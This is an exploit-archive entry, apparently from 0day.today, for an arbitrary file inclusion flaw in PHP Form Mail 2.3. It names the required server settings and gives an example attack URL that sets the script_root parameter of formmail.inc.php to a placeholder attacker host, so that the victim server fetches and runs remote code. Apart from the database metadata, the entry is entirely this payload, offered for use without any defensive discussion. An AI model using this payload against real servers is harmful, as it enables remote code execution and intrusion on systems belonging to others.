PHP Form Mail 2.3 Arbitrary File Inclusion

2005-03-05T00:00:00
ID 1337DAY-ID-75
Type zdt
Reporter Filip Groszynski
Modified 2005-03-05T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==========================================
PHP Form Mail 2.3 Arbitrary File Inclusion
==========================================




Example:

 if register_globals=on and allow_url_fopen=on:
   http://[victim]/[dir]/inc/formmail.inc.php?script_root=http://[hacker_box]/




#  0day.today [2018-04-14]  #